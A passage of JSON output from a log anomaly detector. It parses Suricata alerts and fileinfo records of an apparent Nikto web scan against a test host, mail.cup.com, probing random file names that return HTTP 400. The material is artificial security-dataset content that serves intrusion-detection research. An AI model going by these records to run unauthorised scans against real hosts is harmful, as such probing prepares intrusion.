"/parser/model/flow_id/flow_id": "\"flow_id\":883960087990575,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 883960087990575, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.349508+0000\",\"flow_id\":883960087990575,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46944,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.el\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.el\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.351261 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46946 -> 192.168.10.154:80", "/parser/model/time": 1583349514.351261, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46946, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.351261 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46946 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.idc", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.351522+0000\",\"flow_id\":455618704595240,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46946,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.idc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.idc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.351522, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":455618704595240,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46946,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.idc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.idc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46946,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.idc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.idc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.idc\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.idc\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.idc", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.idc", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46946,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46946, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":455618704595240,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 455618704595240, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.351522+0000\",\"flow_id\":455618704595240,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46946,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.idc\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.idc\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.353104 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46948 -> 192.168.10.154:80", "/parser/model/time": 1583349514.353104, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46948, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.353104 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46948 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.access", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.353275+0000\",\"flow_id\":1306962827043002,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46948,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.access\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.access\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.353275, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1306962827043002,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46948,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.access\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.access\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46948,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.access\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.access\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.access\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.access\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.access", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.access", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46948,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46948, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1306962827043002,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1306962827043002, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.353275+0000\",\"flow_id\":1306962827043002,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46948,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.access\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.access\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.35 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.355207 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46950 -> 192.168.10.154:80", "/parser/model/time": 1583349514.355207, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46950, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.355207 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46950 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.36 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.jsp+", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.355425+0000\",\"flow_id\":1369948522440834,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46950,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.jsp+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.jsp+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.355425, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1369948522440834,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46950,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.jsp+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.jsp+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46950,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.jsp+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.jsp+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.jsp+\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.jsp+\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.jsp+", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.jsp+", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": 